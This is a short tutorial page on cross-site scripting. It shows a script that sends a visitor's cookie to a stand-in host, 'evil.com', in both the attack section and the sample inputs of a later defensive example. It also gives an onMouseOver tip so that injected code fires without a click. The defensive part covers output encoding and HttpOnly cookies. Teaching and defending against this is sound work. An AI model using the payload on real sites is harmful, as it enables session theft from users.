Cross-site scripting

http://www.steve.org.uk/Hacks/XSS/

I can run script, what now?

You've seen how you can enter script into a page and have it run when a user clicks on a link, or views a page.

This is really just a proof of concept; you don't want to have people viewing popup boxes all day!

So .. you want to do something more useful?

Redirection

One common technique is to redirect the user to a different website which you control. This would allow you to record the user's cookie for later (ab)use.

The way I've done this in the past is to use code like this:

<script>
document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie;
</script>

This would redirect the user to a CGI script called 'blah.cgi' on a website 'evil.com'.

The CGI script gets given the cookie of the innocent user as a parameter called 'cookie'. This could be recorded for use later.

Other Tips

Using the onClick handler, you have to rely upon the user clicking on a link you have placed.

You do run the risk that the user will not click it, so what then?

You can use another method, onMouseOver, which allows you to have code executed when the mouse pointer merely moves over a link.
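A defender's view of the Redirection and Other Tips sections above, as an added example that is not code from the original article: output-encoding user text so that an injected script block or onMouseOver link is rendered as inert text, and flagging the session cookie HttpOnly so that document.cookie cannot read it. The function names (escapeHtml, renderComment, sessionCookie) and the sample inputs are hypothetical and constructed for illustration.

```javascript
// Added example: server-side output encoding plus an HttpOnly session cookie.
// All names below are hypothetical; they are not from the original article.

// The five characters that let text break out of HTML element content
// or out of a quoted attribute value.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode untrusted text in a single pass so nothing is double-escaped.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Place user-controlled values into a page: author inside a quoted
// attribute, text inside element content. Both are encoded first.
function renderComment(author, text) {
  return `<div class="comment" title="${escapeHtml(author)}">${escapeHtml(text)}</div>`;
}

// Build a Set-Cookie value. HttpOnly keeps the cookie out of document.cookie,
// so script that does run in the page cannot append it to a URL.
function sessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample inputs: the article's redirect snippet and a link
// carrying an onMouseOver handler, both submitted as comment text.
function demo() {
  const samples = [
    "<script>document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie;</script>",
    '<a href="#" onmouseover="alert(1)">hover me</a>',
  ];
  return samples.map((s) => renderComment('guest', s));
}

console.log(demo().join('\n'));
console.log('Set-Cookie: ' + sessionCookie('sid', 'abc 123'));
```

Encoding must match the context the value lands in; the function above covers HTML element content and quoted attribute values only, not script blocks or URLs.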

Other articles:
http://ha.ckers.org/xss.html
http://www.informit.com/articles/article.asp?p=603037&rl=1